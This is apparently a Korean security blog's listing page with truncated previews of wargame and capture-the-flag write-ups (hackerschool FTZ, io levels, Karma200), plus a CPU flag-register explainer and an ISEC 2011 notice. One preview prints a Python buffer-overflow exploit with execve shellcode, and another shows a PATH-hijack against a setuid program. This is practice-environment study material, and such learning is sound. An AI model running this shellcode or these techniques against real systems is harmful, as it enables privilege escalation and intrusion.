올해에도 ISEC 2011 Conference와 CTF가 진행됩니다. Conference : http://www.isecconference.org/2011/ CTF qual : http://isec2011.wowhacker.com/ 이번에는 해커스쿨 & security proof 주최 해킹캠프와 CTF qual이 하루가 겹쳐서 저는 대회참가를 못할거같네요.

Category : System hacking ssh://ftz.hackerschool.org id : level13 pw : have no clue Summary : buffer overflow on redhat 6.2 서버에 접속하여 문제파일을 확인한다. [level13@ftz level13]$ ls -l 합계 28 -rwsr-x--- 1 level14 level13 13953 3월 8 2003 attackme -rw-r----- 1 root level13 258 3월 8 2003 hint drwxr-xr-x 2 root level13 4096 2월 24 2002 public_html drwxrwxr-x 2 root level13 4096 7월 21 03:58 tmp [level13@ftz level..

Category : System hacking ssh://ftz.hackerschool.org id : level12 pw : it is like this Summary : buffer overflow on redhat 6.2 서버에 접속하여 문제 파일을 확인한다. [level12@ftz level12]$ ls -l 합계 28 -rwsr-x--- 1 level13 level12 13771 3월 8 2003 attackme -rw-r----- 1 root level12 204 3월 8 2003 hint drwxr-xr-x 2 root level12 4096 2월 24 2002 public_html drwxrwxr-x 2 root level12 4096 7월 21 05:15 tmp [level12@ftz ..

1) Flag register Flag register는 CPU 내부 기구중 하나로 산술 연산 결과의 상태를 보여주는 flag bit들이 모인 레지스터이다. 산술 연산시 CPU에 의해 자동적으로 세팅되며 , 프로세서의 현재 상태를 결정한다. 상태레지스터라고 불리고 기종에 따라 condition register라고 불리기도한다. 상태 플래그 (Status flag) Carry Flag (CF) Unsigned overflow가 발생할 때 1로 세팅된다. Parity Flag (PF) 연산결과에 1인 bit의 개수가 짝수개이면 1 , 홀수개이면 0으로 세팅된다. Auxiliary Flag (AF) 연산결과 하위 4bit에 Unsigned overflow가 발생했을때 1로 세팅된다. Zero Flag (ZF)..

level5@io:/tmp/pwn3r$ cat exploit.py #!/usr/bin/python import os TARGET = "/levels/level05" SHELLCODE = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" print "[!] Exploit started!" for i in range(0xff , 0x00 , -1): for j in range(0x01 , 0x100 , 100): payload = "" payload += "\x90" * 100 payload += SHELLCODE payload += "\x90" * (40 - len(SHEL..

level4@io:/tmp/.pwn3r$ ls -l /levels/level04* -r-sr-x--- 1 level5 level4 7016 Nov 16 2007 /levels/level04 -r-------- 1 level4 level4 65 Nov 16 2007 /levels/level04.c level4@io:/tmp/.pwn3r$ cat /levels/level04.c #include int main() { system("id"); return 0; } level4@io:/tmp/.pwn3r$ ls -l total 12 -rwxr-xr-x 1 level4 level4 6639 Apr 8 15:09 id -rw-r--r-- 1 level4 level4 89 Apr 8 15:09 id.c level4@..

Category : System hacking ssh://ftz.hackerschool.org id : level11 pw : what!@#$? Summary : buffer overflow on redhat 6.2 서버에 접속하여 문제 파일을 확인한다. [level11@ftz level11]$ ls -l 합계 28 -rwsr-x--- 1 level12 level11 13733 3월 8 2003 attackme -rw-r----- 1 root level11 168 3월 8 2003 hint drwxr-xr-x 2 root level11 4096 2월 24 2002 public_html drwxrwxr-x 4 root level11 4096 7월 12 13:18 tmp [level11@ftz level1..

Category : system hacking * file Summary : buffer overflow , mov %eax,%esp; call execve; * karma 서버에 대한 설명은 Karma100에 작성했습니다. 문제서버에 접속하여 문제파일을 확인한다. [karma200@localhost ~]$ ls -l total 12 -rwsr-sr-x. 1 root root 4895 Jan 17 10:01 attackme -rw-r--r--. 1 root root 311 Jan 17 10:01 attackme.c 프로그램과 source file이 주어졌다. [karma200@localhost ~]$ cat attackme.c /* * Enjoy! * * * * */ #include #include #..